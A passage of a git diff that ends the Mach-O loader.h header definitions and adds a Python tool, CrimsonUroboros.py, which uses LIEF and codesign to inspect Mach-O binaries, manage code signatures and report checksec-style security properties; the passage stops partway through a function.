resolver offset. + * The stub is used by non-lazy pointers. The resolver is used + * by lazy pointers and must be called to get the actual address to use. + * + * After the optional exported symbol information is a byte of + * how many edges (0-255) that this node has leaving it, + * followed by each edge. + * Each edge is a zero terminated UTF8 of the addition chars + * in the symbol, followed by a uleb128 offset for the node that + * edge points to. + * + */ + uint32_t export_off; /* file offset to lazy binding info */ + uint32_t export_size; /* size of lazy binding infs */ +}; + +/* + * The following are used to encode rebasing information + */ +#define REBASE_TYPE_POINTER 1 +#define REBASE_TYPE_TEXT_ABSOLUTE32 2 +#define REBASE_TYPE_TEXT_PCREL32 3 + +#define REBASE_OPCODE_MASK 0xF0 +#define REBASE_IMMEDIATE_MASK 0x0F +#define REBASE_OPCODE_DONE 0x00 +#define REBASE_OPCODE_SET_TYPE_IMM 0x10 +#define REBASE_OPCODE_SET_SEGMENT_AND_OFFSET_ULEB 0x20 +#define REBASE_OPCODE_ADD_ADDR_ULEB 0x30 +#define REBASE_OPCODE_ADD_ADDR_IMM_SCALED 0x40 +#define REBASE_OPCODE_DO_REBASE_IMM_TIMES 0x50 +#define REBASE_OPCODE_DO_REBASE_ULEB_TIMES 0x60 +#define REBASE_OPCODE_DO_REBASE_ADD_ADDR_ULEB 0x70 +#define REBASE_OPCODE_DO_REBASE_ULEB_TIMES_SKIPPING_ULEB 0x80 + + +/* + * The following are used to encode binding information + */ +#define BIND_TYPE_POINTER 1 +#define BIND_TYPE_TEXT_ABSOLUTE32 2 +#define BIND_TYPE_TEXT_PCREL32 3 + +#define BIND_SPECIAL_DYLIB_SELF 0 +#define BIND_SPECIAL_DYLIB_MAIN_EXECUTABLE -1 +#define BIND_SPECIAL_DYLIB_FLAT_LOOKUP -2 +#define BIND_SPECIAL_DYLIB_WEAK_LOOKUP -3 + +#define BIND_SYMBOL_FLAGS_WEAK_IMPORT 0x1 +#define BIND_SYMBOL_FLAGS_NON_WEAK_DEFINITION 0x8 + +#define BIND_OPCODE_MASK 0xF0 +#define BIND_IMMEDIATE_MASK 0x0F +#define BIND_OPCODE_DONE 0x00 +#define BIND_OPCODE_SET_DYLIB_ORDINAL_IMM 0x10 +#define BIND_OPCODE_SET_DYLIB_ORDINAL_ULEB 0x20 +#define BIND_OPCODE_SET_DYLIB_SPECIAL_IMM 0x30 +#define BIND_OPCODE_SET_SYMBOL_TRAILING_FLAGS_IMM 0x40 +#define BIND_OPCODE_SET_TYPE_IMM 0x50 +#define BIND_OPCODE_SET_ADDEND_SLEB 0x60 +#define BIND_OPCODE_SET_SEGMENT_AND_OFFSET_ULEB 0x70 +#define BIND_OPCODE_ADD_ADDR_ULEB 0x80 +#define BIND_OPCODE_DO_BIND 0x90 +#define BIND_OPCODE_DO_BIND_ADD_ADDR_ULEB 0xA0 +#define BIND_OPCODE_DO_BIND_ADD_ADDR_IMM_SCALED 0xB0 +#define BIND_OPCODE_DO_BIND_ULEB_TIMES_SKIPPING_ULEB 0xC0 +#define BIND_OPCODE_THREADED 0xD0 +#define BIND_SUBOPCODE_THREADED_SET_BIND_ORDINAL_TABLE_SIZE_ULEB 0x00 +#define BIND_SUBOPCODE_THREADED_APPLY 0x01 + + +/* + * The following are used on the flags byte of a terminal node + * in the export information. + */ +#define EXPORT_SYMBOL_FLAGS_KIND_MASK 0x03 +#define EXPORT_SYMBOL_FLAGS_KIND_REGULAR 0x00 +#define EXPORT_SYMBOL_FLAGS_KIND_THREAD_LOCAL 0x01 +#define EXPORT_SYMBOL_FLAGS_KIND_ABSOLUTE 0x02 +#define EXPORT_SYMBOL_FLAGS_WEAK_DEFINITION 0x04 +#define EXPORT_SYMBOL_FLAGS_REEXPORT 0x08 +#define EXPORT_SYMBOL_FLAGS_STUB_AND_RESOLVER 0x10 + +/* + * The linker_option_command contains linker options embedded in object files. + */ +struct linker_option_command { + uint32_t cmd; /* LC_LINKER_OPTION only used in MH_OBJECT filetypes */ + uint32_t cmdsize; + uint32_t count; /* number of strings */ + /* concatenation of zero terminated UTF8 strings. + Zero filled at end to align */ +}; + +/* + * The symseg_command contains the offset and size of the GNU style + * symbol table information as described in the header file . + * The symbol roots of the symbol segments must also be aligned properly + * in the file. So the requirement of keeping the offsets aligned to a + * multiple of a 4 bytes translates to the length field of the symbol + * roots also being a multiple of a long. Also the padding must again be + * zeroed. (THIS IS OBSOLETE and no longer supported). + */ +struct symseg_command { + uint32_t cmd; /* LC_SYMSEG */ + uint32_t cmdsize; /* sizeof(struct symseg_command) */ + uint32_t offset; /* symbol segment offset */ + uint32_t size; /* symbol segment size in bytes */ +}; + +/* + * The ident_command contains a free format string table following the + * ident_command structure. The strings are null terminated and the size of + * the command is padded out with zero bytes to a multiple of 4 bytes/ + * (THIS IS OBSOLETE and no longer supported). + */ +struct ident_command { + uint32_t cmd; /* LC_IDENT */ + uint32_t cmdsize; /* strings that follow this command */ +}; + +/* + * The fvmfile_command contains a reference to a file to be loaded at the + * specified virtual address. (Presently, this command is reserved for + * internal use. The kernel ignores this command when loading a program into + * memory). + */ +struct fvmfile_command { + uint32_t cmd; /* LC_FVMFILE */ + uint32_t cmdsize; /* includes pathname string */ + union lc_str name; /* files pathname */ + uint32_t header_addr; /* files virtual address */ +}; + + +/* + * The entry_point_command is a replacement for thread_command. + * It is used for main executables to specify the location (file offset) + * of main(). If -stack_size was used at link time, the stacksize + * field will contain the stack size need for the main thread. + */ +struct entry_point_command { + uint32_t cmd; /* LC_MAIN only used in MH_EXECUTE filetypes */ + uint32_t cmdsize; /* 24 */ + uint64_t entryoff; /* file (__TEXT) offset of main() */ + uint64_t stacksize;/* if not zero, initial stack size */ +}; + + +/* + * The source_version_command is an optional load command containing + * the version of the sources used to build the binary. + */ +struct source_version_command { + uint32_t cmd; /* LC_SOURCE_VERSION */ + uint32_t cmdsize; /* 16 */ + uint64_t version; /* A.B.C.D.E packed as a24.b10.c10.d10.e10 */ +}; + + +/* + * The LC_DATA_IN_CODE load commands uses a linkedit_data_command + * to point to an array of data_in_code_entry entries. Each entry + * describes a range of data in a code section. + */ +struct data_in_code_entry { + uint32_t offset; /* from mach_header to start of data range*/ + uint16_t length; /* number of bytes in data range */ + uint16_t kind; /* a DICE_KIND_* value */ +}; +#define DICE_KIND_DATA 0x0001 +#define DICE_KIND_JUMP_TABLE8 0x0002 +#define DICE_KIND_JUMP_TABLE16 0x0003 +#define DICE_KIND_JUMP_TABLE32 0x0004 +#define DICE_KIND_ABS_JUMP_TABLE32 0x0005 + + + +/* + * Sections of type S_THREAD_LOCAL_VARIABLES contain an array + * of tlv_descriptor structures. + */ +struct tlv_descriptor +{ + void* (*thunk)(struct tlv_descriptor*); + unsigned long key; + unsigned long offset; +}; + +/* + * LC_NOTE commands describe a region of arbitrary data included in a Mach-O + * file. Its initial use is to record extra data in MH_CORE files. + */ +struct note_command { + uint32_t cmd; /* LC_NOTE */ + uint32_t cmdsize; /* sizeof(struct note_command) */ + char data_owner[16]; /* owner name for this LC_NOTE */ + uint64_t offset; /* file offset of this data */ + uint64_t size; /* length of data region */ +}; + +#endif /* _MACHO_LOADER_H_ */ \ No newline at end of file diff --git a/IV. Dylibs/python/CrimsonUroboros.py b/IV. Dylibs/python/CrimsonUroboros.py new file mode 100755 index 0000000..c70f4a0 --- /dev/null +++ b/IV. Dylibs/python/CrimsonUroboros.py @@ -0,0 +1,1304 @@ +#!/usr/bin/env python3 +import lief +import uuid +import argparse +import subprocess +import os +import sys +import mmap +import plistlib +import json +import sys +import treelib + +'''*** REMAINDER *** +Change initialization in MachOProcessoer -> process -> try block. +Always initialize the latest Snake class: + +snake_instance = SnakeII(binaries) +''' +### --- I. MACH-O --- ### +class MachOProcessor: + def __init__(self, file_path): + '''This class contains part of the code from the main() for the SnakeI: Mach-O part.''' + self.file_path = os.path.abspath(file_path) + + def parseFatBinary(self): + return lief.MachO.parse(self.file_path) + + def process(self): + '''Executes the code for the SnakeI: Mach-O. *** ''' + if not os.path.exists(self.file_path): # Check if file_path specified in the --path argument exists. + print(f'The file {self.file_path} does not exist.') + exit() + + try: # Check if the file has a valid Mach-O format + global binaries # It must be global, becuase after the class is destructed, the snake_instance would point to invalid memory ("binary" is dependant on "binaries"). + binaries = self.parseFatBinary() + if binaries == None: + exit() # Exit if not + + global snake_instance # Must be globall for further processors classes. + snake_instance = SnakeIV(binaries, self.file_path) # Initialize the latest Snake class + + if args.file_type: # Print binary file type + print(f'File type: {snake_instance.getFileType()}') + if args.header_flags: # Print binary header flags + header_flag_list = snake_instance.getHeaderFlags() + print("Header flags:", " ".join(header_flag.name for header_flag in header_flag_list)) + if args.endian: # Print binary endianess + print(f'Endianess: {snake_instance.getEndianess()}') + if args.header: # Print binary header + print(snake_instance.getBinaryHeader()) + if args.load_commands: # Print binary load commands + load_commands_list = snake_instance.getLoadCommands() + print("Load Commands:", " ".join(load_command.command.name for load_command in load_commands_list)) + if args.segments: # Print binary segments in human friendly form + for segment in snake_instance.getSegments(): + print(segment) + if args.sections: # Print binary sections in human friendly form + for section in snake_instance.getSections(): + print(section) + if args.symbols: # Print symbols + for symbol in snake_instance.getSymbols(): + print(symbol.name) + if args.chained_fixups: # Print Chained Fixups information + print(snake_instance.getChainedFixups()) + if args.exports_trie: # Print Exports Trie information + print(snake_instance.getExportTrie()) + if args.uuid: # Print UUID + print(f'UUID: {snake_instance.getUUID()}') + if args.main: # Print entry point and stack size + print(f'Entry point: {hex(snake_instance.getMain().entrypoint)}') + print(f'Stack size: {hex(snake_instance.getMain().stack_size)}') + if args.encryption_info is not None: # Print encryption info and save encrypted data if path is specified + if snake_instance.binary.has_encryption_info: + crypt_id, crypt_offset, crypt_size = snake_instance.getEncryptionInfo() + print(f"cryptid: {crypt_id}") + print(f"cryptoffset: {hex(crypt_offset)}") + print(f"cryptsize: {hex(crypt_size)}") + save_path = args.encryption_info + if save_path and save_path.strip(): + snake_instance.saveEcryptedData(save_path.strip()) + else: + print(f"{os.path.basename(file_path)} binary does not have encryption info.") + if args.strings_section: # Print strings from __cstring section + print('Strings from __cstring section:') + print('-------------------------------') + for string in (snake_instance.getStringSection()): + print(string) + if args.all_strings: # Print strings from all sections. + print(snake_instance.findAllStringsInBinary()) + if args.save_strings: # Parse all sections, detect strings and save them to a file + extracted_strings = snake_instance.findAllStringsInBinary() + with open(args.save_strings, 'a') as f: + for s in extracted_strings: + f.write(s) + if args.info: # Print all info about the binary + print('\n<=== HEADER ===>') + print(snake_instance.getBinaryHeader()) + print('\n<=== LOAD COMMANDS ===>') + for lcd in snake_instance.getLoadCommands(): + print(lcd) + print("="*50) + print('\n<=== SEGMENTS ===>') + for segment in snake_instance.getSegments(): + print(segment) + print('\n<=== SECTIONS ===>') + for section in snake_instance.getSections(): + print(section) + print('\n<=== SYMBOLS ===>') + for symbol in snake_instance.getSymbols(): + print(symbol.name) + print('\n<=== STRINGS ===>') + print('Strings from __cstring section:') + print('-------------------------------') + for string in (snake_instance.getStringSection()): + print(string) + if snake_instance.binary.has_encryption_info: + print('\n<=== ENCRYPTION INFO ===>') + crypt_id, crypt_offset, crypt_size = snake_instance.getEncryptionInfo() + print(f"cryptid: {crypt_id}") + print(f"cryptoffset: {hex(crypt_offset)}") + print(f"cryptsize: {hex(crypt_size)}") + print('\n<=== UUID ===>') + print(f'{snake_instance.getUUID()}') + print('\n<=== ENDIANESS ===>') + print(snake_instance.getEndianess()) + print('\n<=== ENTRYPOINT ===>') + print(f'{hex(snake_instance.getMain().entrypoint)}') + except Exception as e: # Handling any unexpected errors + print(f"An error occurred during SnakeI: Mach-O processing: {e}") + exit() +class SnakeI: + def __init__(self, binaries, file_path): + '''When initiated, the program parses a Universal binary (binaries parameter) and extracts the ARM64 Mach-O. If the file is not in a universal format but is a valid ARM64 Mach-O, it is taken as a binary parameter during initialization.''' + self.binary = self.parseFatBinary(binaries) + self.file_path = file_path + self.load_commands = self.getLoadCommands() + self.endianess = self.getEndianess() + self.fat_offset = self.binary.fat_offset # For various calculations, if ARM64 Mach-O extracted from Universal Binary + self.prot_map = { + 0: '---', + 1: 'r--', + 2: '-w-', + 3: 'rw-', + 4: '--x', + 5: 'r-x', + 6: '-wx', + 7: 'rwx' + } + self.segment_flags_map = { + 0x1: 'SG_HIGHVM', + 0x2: 'SG_FVMLIB', + 0x4: 'SG_NORELOC', + 0x8: 'SG_PROTECTED_VERSION_1', + 0x10: 'SG_READ_ONLY', + } + + def mapProtection(self, numeric_protection): + '''Maps numeric protection to its string representation.''' + return self.prot_map.get(numeric_protection, 'Unknown') + + def getSegmentFlags(self, flags): + '''Maps numeric segment flags to its string representation.''' + return self.segment_flags_map.get(flags, '') + #return " ".join(activated_flags) + + def parseFatBinary(self, binaries): + '''Parse Mach-O file, whether compiled for multiple architectures or just for a single one. It returns the ARM64 binary if it exists. If not, it exits the program.''' + for binary in binaries: + if binary.header.cpu_type == lief.MachO.CPU_TYPES.ARM64: + arm64_bin = binary + if arm64_bin == None: + print('The specified Mach-O file is not in ARM64 architecture.') + exit() + return arm64_bin + + def getFileType(self): + """Extract and return the file type from a binary object's header.""" + return self.binary.header.file_type.name + + def getHeaderFlags(self): + '''Return binary header flags.''' + return self.binary.header.flags_list + + def getEndianess(self): + '''Check the endianness of a binary based on the system and binary's magic number.''' + magic = self.binary.header.magic.name + endianness = sys.byteorder + if endianness == 'little' and (magic == 'MAGIC_64' or magic == 'MAGIC' or magic == 'FAT_MAGIC'): + return 'little' + else: + return 'big' + + def getBinaryHeader(self): + '''https://lief-project.github.io/doc/stable/api/python/macho.html#header''' + return self.binary.header + + def getLoadCommands(self): + '''https://lief-project.github.io/doc/stable/api/python/macho.html#loadcommand''' + return self.binary.commands + + def getSegments(self): + '''Extract segmenents from binary and return a human readable string: https://lief-project.github.io/doc/stable/api/python/macho.html#lief.MachO.SegmentCommand''' + segment_info = [] + for segment in self.binary.segments: + name = segment.name + va_start = '0x' + format(segment.virtual_address, '016x') + va_end = '0x' + format(int(va_start, 16) + segment.virtual_size, '016x') + file_start = hex(segment.file_size + self.fat_offset) + file_end = hex(int(file_start, 16) + segment.file_size) + init_prot = self.mapProtection(segment.init_protection) + max_prot = self.mapProtection(segment.max_protection) + flags = self.getSegmentFlags(segment.flags) + if flags != '': + segment_info.append(f'{name.ljust(16)}{init_prot}/{max_prot.ljust(8)} VM: {va_start}-{va_end.ljust(24)} FILE: {file_start}-{file_end} ({flags})') + else: + segment_info.append(f'{name.ljust(16)}{init_prot}/{max_prot.ljust(8)} VM: {va_start}-{va_end.ljust(24)} FILE: {file_start}-{file_end}') + return segment_info + + def getSections(self): + '''Extract sections from binary and return in human readable format: https://lief-project.github.io/doc/stable/api/python/macho.html#lief.MachO.Section''' + sections_info = [] + sections_info.append("SEGMENT".ljust(14) + "SECTION".ljust(20) + "TYPE".ljust(28) + "VIRTUAL MEMORY".ljust(32) + "FILE".ljust(26) + "FLAGS".ljust(40)) + sections_info.append(len(sections_info[0])*"=") + for section in self.binary.sections: + segment_name = section.segment_name + section_name = section.fullname + section_type = section.type.name + section_va_start = hex(section.virtual_address) + section_va_end = hex(section.virtual_address + section.offset) + section_size_start = hex(section.offset + self.fat_offset) + section_size_end = hex(section.size + section.offset + self.fat_offset) + section_flags_list = section.flags_list + flags_strings = [flag.name for flag in section_flags_list] + flags = " ".join(flags_strings) + sections_info.append((f'{segment_name.ljust(14)}{section_name.ljust(20)}{section_type.ljust(28)}{section_va_start}-{section_va_end.ljust(20)}{section_size_start}-{section_size_end}\t\t({flags})')) + return sections_info + + def getSymbols(self): + '''Get all symbols from the binary (LC_SYMTAB, Chained Fixups, Exports Trie): https://lief-project.github.io/doc/stable/api/python/macho.html#symbol''' + return self.binary.symbols + + def getChainedFixups(self): + '''Return Chained Fixups information: https://lief-project.github.io/doc/latest/api/python/macho.html#chained-binding-info''' + return self.binary.dyld_chained_fixups + + def getExportTrie(self): + '''Return Export Trie information: https://lief-project.github.io/doc/latest/api/python/macho.html#dyldexportstrie-command''' + try: + return self.binary.dyld_exports_trie.show_export_trie() + except: + return "NO EXPORT TRIE" + + def getUUID(self): + '''Return UUID as string and in UUID format: https://lief-project.github.io/doc/stable/api/python/macho.html#uuidcommand''' + for cmd in self.binary.commands: + if isinstance(cmd, lief.MachO.UUIDCommand): + uuid_bytes = cmd.uuid + break + uuid_string = str(uuid.UUID(bytes=bytes(uuid_bytes))) + return uuid_string + + def getMain(self): + '''Determine the entry point of an executable.''' + return self.binary.main_command + + def getStringSection(self): + '''Return strings from the __cstring (string table).''' + extracted_strings = set() + for section in self.binary.sections: + if section.type == lief.MachO.SECTION_TYPES.CSTRING_LITERALS: + extracted_strings.update(section.content.tobytes().split(b'\x00')) + return extracted_strings + + def findAllStringsInBinary(self): + '''Check every binary section to find strings.''' + extracted_strings = "" + byte_set = set() + for section in self.binary.sections: + byte_set.update(section.content.tobytes().split(b'\x00')) + for byte_item in byte_set: + try: + decoded_string = byte_item.decode('utf-8') + extracted_strings += decoded_string + "\n" + except UnicodeDecodeError: + pass + return extracted_strings + + def getEncryptionInfo(self): + '''Return information regardles to LC_ENCRYPTION_INFO(_64).''' + if self.binary.has_encryption_info: + crypt_id = self.binary.encryption_info.crypt_id + crypt_offset = self.binary.encryption_info.crypt_offset + crypt_size = self.binary.encryption_info.crypt_size + return crypt_id, crypt_offset, crypt_size + + def extractBytesAtOffset(self, offset, size): + '''Extract bytes at a given offset and of a specified size in a binary file (takes into account Fat Binary slide)''' + # Open the binary file in binary mode + with open(file_path, "rb") as file: + # Check if the specified offset and size are within bounds + file_size = os.path.getsize(file_path) + offset += self.fat_offset # Add the fat_offset in case of the Fat Binary (ARM binary data is most of the time after x86_64 binary data) + #print(hex(offset) + hex(size)) + if offset + size > file_size: + raise ValueError("Offset and size exceed the binary file's length.") + # Seek to the offset considering the fat_offset + file.seek(offset) + # Read the specified size of bytes + extracted_bytes = file.read(size) + return extracted_bytes + + def saveEcryptedData(self,output_path): + _, cryptoff, cryptsize = self.getEncryptionInfo() + self.saveBytesToFile(self.extractBytesAtOffset(cryptoff, cryptsize), output_path) +### --- II. CODE SIGNING --- ### +class CodeSigningProcessor: + def __init__(self): + '''This class contains part of the code from the main() for the SnakeII: Code Signing.''' + pass + + def process(self): + try: + if args.verify_signature: # Verify if Code Signature match the binary content () + if snake_instance.isSigValid(file_path): + print("Valid Code Signature (matches the content)") + else: + print("Invalid Code Signature (does not match the content)") + if args.cd_info: # Print Code Signature information + print(snake_instance.getCodeSignature(file_path).decode('utf-8')) + if args.cd_requirements: # Print Requirements. + print(snake_instance.getCodeSignatureRequirements(file_path).decode('utf-8')) + if args.entitlements: # Print Entitlements. + print(snake_instance.getEntitlementsFromCodeSignature(file_path,args.entitlements)) + if args.extract_cms: # Extract the CMS Signature and save it to a given file. + cms_signature = snake_instance.extractCMS() + snake_instance.saveBytesToFile(cms_signature, args.extract_cms) + if args.extract_certificates: # Extract Certificates and save them to a given file. + snake_instance.extractCertificatesFromCodeSignature(args.extract_certificates) + if args.remove_sig: # Save a new file on a disk with the removed signature: + snake_instance.removeCodeSignature(args.remove_sig) + if args.sign_binary: # Sign the given binary using specified identity: + snake_instance.signBinary(args.sign_binary) + except Exception as e: + print(f"An error occurred during SnakeII: Code Signing processing: {e}") +class SnakeII(SnakeI): + def __init__(self, binaries, file_path): + super().__init__(binaries, file_path) + self.magic_bytes = (0xFADE0B01).to_bytes(4, byteorder='big') # CMS Signature Blob magic bytes, as Code Signature as a whole is in network byte order(big endian). + + def isSigValid(self, file_path): + '''Checks if the Code Signature is valid (if the contents of the binary have been modified.)''' + result = subprocess.run(["codesign", "-v", file_path], capture_output=True) + if result.stderr == b'': + return True + else: + return False + + def getCodeSignature(self, file_path): + '''Returns information about the Code Signature.''' + result = subprocess.run(["codesign", "-d", "-vvvvvv", file_path], capture_output=True) + return result.stderr + + def getCodeSignatureRequirements(self, file_path): + '''Returns information about the Code Signature Requirements.''' + result = subprocess.run(["codesign", "-d", "-r", "-", file_path], capture_output=True) + return result.stdout + + def getEntitlementsFromCodeSignature(self, file_path, format=None): + '''Returns information about the Entitlements for Code Signature.''' + if format == 'human' or format == None: + result = subprocess.run(["codesign", "-d", "--entitlements", "-", file_path], capture_output=True) + return result.stdout.decode('utf-8') + elif format == 'xml': + result = subprocess.run(["codesign", "-d", "--entitlements", "-", "--xml", file_path], capture_output=True) + elif format == 'der': + result = subprocess.run(["codesign", "-d", "--entitlements", "-", "--der", file_path], capture_output=True) + return result.stdout + + def extractCMS(self): + '''Find the offset of magic bytes in a binary using LIEF.''' + cs = self.binary.code_signature + cs_content = bytes(cs.content) + offset = cs_content.find(self.magic_bytes) + cms_len_in_bytes = cs_content[offset + 4:offset + 8] + cms_len_in_int = int.from_bytes(cms_len_in_bytes, byteorder='big') + cms_signature = cs_content[offset + 8:offset + 8 + cms_len_in_int] + return cms_signature + + def saveBytesToFile(self, data, filename): + '''Save bytes to a file.''' + with open(filename, 'wb') as file: + file.write(data) + + def extractCertificatesFromCodeSignature(self, cert_name): + '''Extracts certificates from the CMS Signature and saves them to a file with _0, _1, _2 indexes at the end of the file names.''' + subprocess.run(["codesign", "-d", f"--extract-certificates={cert_name}_", file_path], capture_output=True) + + def removeCodeSignature(self, new_name): + '''Save new file on a disk with removed signature.''' + self.binary.remove_signature() + self.binary.write(new_name) + + def signBinary(self,security_identity=None): + '''Sign binary using pseudo identity (adhoc) or specified identity.''' + if security_identity == 'adhoc' or security_identity == None: + result = subprocess.run(["codesign", "-s", "-", "-f", file_path], capture_output=True) + return result.stdout.decode('utf-8') + else: + try: + result = subprocess.run(["codesign", "-s", security_identity, "-f", file_path], capture_output=True) + except Exception as e: + print(f"An error occurred during Code Signing using {security_identity}\n {e}") +### --- III. CHECKSEC --- ### +class ChecksecProcessor: + def __init__(self): + '''This class contains part of the code from the main() for the SnakeIII: Checksec.''' + pass + + def process(self): + try: + if args.has_pie: # Check if PIE is set in the header flags + print("PIE: " + str(snake_instance.hasPIE())) + if args.has_arc: # Check if ARC is in use + print("ARC: " + str(snake_instance.hasARC())) + if args.is_stripped: # Check if binary is stripped + print("STRIPPED: " + str(snake_instance.isStripped())) + if args.has_canary: # Check if binary has stack canary + print("CANARY: " + str(snake_instance.hasCanary())) + if args.has_nx_stack: # Check if binary has non executable stack + print("NX STACK: " + str(snake_instance.hasNXstack())) + if args.has_nx_heap: # Check if binary has non executable heap + print("NX HEAP: " + str(snake_instance.hasNXheap())) + if args.has_xn: # Check if binary is protected by eXecute Never functionality + print(f"eXecute Never: {str(snake_instance.hasXN())}") + if args.is_notarized: # Check if the application is notarized and can pass the Gatekeeper verification + print("NOTARIZED: " + str(snake_instance.isNotarized(file_path))) + if args.is_encrypted: # Check if the application has encrypted data + print("ENCRYPTED: " + str(snake_instance.isEncrypted())) + if args.has_restrict: # Check if the application has encrypted data + print("RESTRICTED: " + str(snake_instance.hasRestrictSegment())) + if args.is_hr: # Check if Hardened Runtime is in use + print("HARDENED: " + str(snake_instance.hasHardenedRuntimeFlag(file_path))) + if args.is_as: # Check if App Sandbox is in use + print("APP SANDBOX: " + str(snake_instance.hasAppSandbox(file_path))) + if args.is_fort: # Check if binary is fortified + fortified_symbols = snake_instance.getForifiedSymbols() + print("FORTIFIED: " + str(snake_instance.isFortified(fortified_symbols))) + if args.has_rpath: # Check if binary has @rpaths + print("RPATH: " + str(snake_instance.hasRpath())) + if args.checksec: # Run all checks from above and present it in a table + print("<==== CHECKSEC ======") + print("PIE: ".ljust(16) + str(snake_instance.hasPIE())) + print("ARC: ".ljust(16) + str(snake_instance.hasARC())) + print("STRIPPED: ".ljust(16) + str(snake_instance.isStripped())) + print("CANARY: ".ljust(16) + str(snake_instance.hasCanary())) + print("NX STACK: ".ljust(16) + str(snake_instance.hasNXstack())) + print("NX HEAP: ".ljust(16) + str(snake_instance.hasNXheap())) + print("XN:".ljust(16) + str(snake_instance.hasXN())) + print("NOTARIZED: ".ljust(16) + str(snake_instance.isNotarized(file_path))) + print("ENCRYPTED: ".ljust(16) + str(snake_instance.isEncrypted())) + print("RESTRICTED: ".ljust(16) + str(snake_instance.hasRestrictSegment())) + print("HARDENED: ".ljust(16) + str(snake_instance.hasHardenedRuntimeFlag(file_path))) + print("APP SANDBOX: ".ljust(16) + str(snake_instance.hasAppSandbox(file_path))) + fortified_symbols = snake_instance.getForifiedSymbols() + print("FORTIFIED: ".ljust(16) + str(snake_instance.isFortified(fortified_symbols))) + print("RPATH: ".ljust(16) + str(snake_instance.hasRpath())) + print("=====================>") + except Exception as e: + print(f"An error occurred during SnakeIII: Checksec processing: {e}") +class SnakeIII(SnakeII): + def __init__(self, binaries, file_path): + super().__init__(binaries, file_path) + + def hasPIE(self): + '''Check if MH_PIE (0x00200000) is set in the header flags.''' + return self.binary.is_pie + + def hasARC(self): + '''Check if the _objc_release symbol is imported.''' + for symbol in self.binary.symbols: + if symbol.name.lower().strip() == '_objc_release': + return True + return False + + def isStripped(self): + '''Check if binary is stripped.''' + filter_symbols = ['radr://5614542', '__mh_execute_header'] + + for symbol in self.binary.symbols: + symbol_type = symbol.type + symbol_name = symbol.name.lower().strip() + + is_symbol_stripped = (symbol_type & 0xe0 > 0) or (symbol_type in [0x0e, 0x1e, 0x0f]) + is_filtered = symbol_name not in filter_symbols + + if is_symbol_stripped and is_filtered: + return False + return True + + def hasCanary(self): + '''Check whether in the binary there are symbols: ___stack_chk_fail and ___stack_chk_guard.''' + canary_symbols = ['___stack_chk_fail', '___stack_chk_guard'] + for symbol in self.binary.symbols: + if symbol.name.lower().strip() in canary_symbols: + return True + return False + + def hasNXstack(self): + '''Check if MH_ALLOW_STACK_EXECUTION (0x00020000 ) is not set in the header flags.''' + return not bool(self.binary.header.flags & lief.MachO.HEADER_FLAGS.ALLOW_STACK_EXECUTION.value) + + def hasNXheap(self): + '''Check if MH_NO_HEAP_EXECUTION (0x01000000 ) is set in the header flags.''' + return bool(self.binary.header.flags & lief.MachO.HEADER_FLAGS.NO_HEAP_EXECUTION.value) + + def isXNos(): + '''Check if the OS is running on the ARM architecture.''' + system_info = os.uname() + if "arm" in system_info.machine.lower(): + return True + return False + + def checkXNmap(): + '''If XN is ON, you will not be able to map memory page that has W&X at the same time, so to check it, you can create such page.''' + try: + mmap.mmap(-1,4096, prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC) + except mmap.error as e: + #print(f"Failed to create W&X memory map - eXecute Never is supported on this machine. \n {str(e)}") + return True + return False + + def convertXMLEntitlementsToDict(self, entitlements_xml): + '''Takes the Entitlements in XML format from getEntitlementsFromCodeSignature() method and convert them to a dictionary.''' + return plistlib.loads(entitlements_xml) + + def convertDictEntitlementsToJson(self,entitlements_dict): + '''Takes the Entitlements in dictionary format from convertXMLEntitlementsToDict() method and convert them to a JSON with indent 4.''' + return json.dumps(entitlements_dict, indent=4) + + def checkIfEntitlementIsUsed(self, entitlement_name, entitlement_value, file_path): + '''Check if the given entitlement exists and has the specified value.''' + try: + entitlements_xml = self.getEntitlementsFromCodeSignature(file_path, 'xml') + if entitlements_xml == b'': # Return False if there are no entitlements + return False + entitlements_dict = self.convertXMLEntitlementsToDict(entitlements_xml) + # Convert the entire parsed data to lowercase for case-insensitive comparison + parsed_data = {key.lower(): value for key, value in entitlements_dict.items()} + # Convert entitlement name and value to lowercase for case-insensitive and type-insensitive comparison + entitlement_name_lower = entitlement_name.lower() + entitlement_value_lower = str(entitlement_value).lower() + + if entitlement_name_lower in parsed_data and str(parsed_data[entitlement_name_lower]).lower() == entitlement_value_lower: + return True + else: + return False + except json.JSONDecodeError as e: + # Handle JSON decoding error if any + print(f"Error in checkIfEntitlementIsUsed: {e}") + return False + + def hasAllowJITentitlement(self, file_path): + '''Checks if the binary has missing com.apple.security.cs.allow-jit entitlement that allows the app to create writable and executable memory using the MAP_JIT flag.''' + if self.checkIfEntitlementIsUsed('com.apple.security.cs.allow-jit', 'true', file_path): + print(f"[INFO -> XN]: {os.path.basename(file_path)} contains allow-jit entitlement.") + return True + return False + + def checkIfCompiledForOtherThanARM(self): + '''Iterates over FatBinary and check if there are other architectures than ARM.''' + XN_types = [lief.MachO.CPU_TYPES.ARM64, lief.MachO.CPU_TYPES.ARM] + for binary in binaries: + if binary.header.cpu_type not in XN_types: + print(f"[INFO -> XN]: {os.path.basename(file_path)} is compiled for other CPUs than ARM or ARM64.") + return True + return False + + def hasXN(self): + '''Check if binary allows W&X via com.apple.security.cs.allow-jit entitlement or is compiled for other CPU types than these which supports eXecuteNever feature of ARM.''' + if self.hasAllowJITentitlement(self.file_path) or self.checkIfCompiledForOtherThanARM(): + return False + return True + + def isNotarized(self, file_path): + '''Verifies if the application is notarized and can pass the Gatekeeper verification.''' + result = subprocess.run(["spctl", "-a", file_path], capture_output=True) + if result.stderr == b'': + return True + else: + #print(f"[INFO -> NOTARIZATION]: {result.stderr.decode().rstrip()}") + return False + + def isEncrypted(self): + '''If the cryptid has a non-zero value, some parts of the binary are encrypted.''' + if self.binary.has_encryption_info: + if self.binary.encryption_info.crypt_id == 1: + return True + return False + + def hasRestrictSegment(self): + '''Check if binary contains __RESTRICT segment. Return True if it does.''' + for segment in self.binary.segments: + if segment.name.lower().strip() == "__restrict": + return True + return False + + def hasHardenedRuntimeFlag(self, file_path): + '''Check if Hardened Runtime flag is set for the given binary.''' + if b'runtime' in self.getCodeSignature(file_path): + return True + return False + + def hasAppSandbox(self, file_path): + '''Check if App Sandbox is in use (com.apple.security.app-sandbox entitlement is set).''' + if self.checkIfEntitlementIsUsed('com.apple.security.app-sandbox', 'true', file_path): + return True + return False + + def getForifiedSymbols(self): + '''Check for symbol names that contain _chk suffix and filter out stack canary symbols. Function returns a list of all safe symbols.''' + symbol_fiter = ['___stack_chk_fail', '___stack_chk_guard'] + 